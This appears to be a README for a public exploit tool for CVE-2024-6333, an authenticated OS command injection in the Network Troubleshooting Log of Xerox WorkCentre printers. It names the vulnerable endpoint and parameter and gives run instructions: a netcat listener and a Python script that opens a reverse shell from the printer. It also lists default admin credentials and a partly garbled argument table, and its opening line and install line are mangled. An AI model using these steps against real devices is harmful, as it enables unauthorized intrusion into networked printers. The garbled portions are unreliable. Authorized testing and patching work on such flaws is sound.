
Authenticated Remote Code Execution vulnerability in Xerox WorkCentre printers via the Network Troubleshooting Log feature.
Authenticated Remote Code Execution vulnerability in Xerox WorkCentre printers via the Network Troubleshooting Log feature.
The Network Troubleshooting Log functionality (/properties/security/network_troubleshooting_log.php) fails to sanitize the destination server parameter (security.nwtroubleshoot.destination.server), allowing an authenticated administrator to inject arbitrary OS commands. When the network log capture is started, the injected payload is executed as a shell command, resulting in remote code execution.
073.110.019.14200)pip install -r requirements.txt
Start a listener on your machine:
nc -lvnp 8443
Run the exploit:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal.
| Argument | Required | Default | Description |
|---|
--target | Yes | Target URL (e.g., https://192.0.2.1) | |
--lhost | Yes | Listener IP address | |
--lport | No | 8443 | Listener port |
--user | No | admin | Admin username |
--password | No | 1111 | Admin password |
--proxy | No | Proxy URL (e.g., http://127.0.0.1:8080) |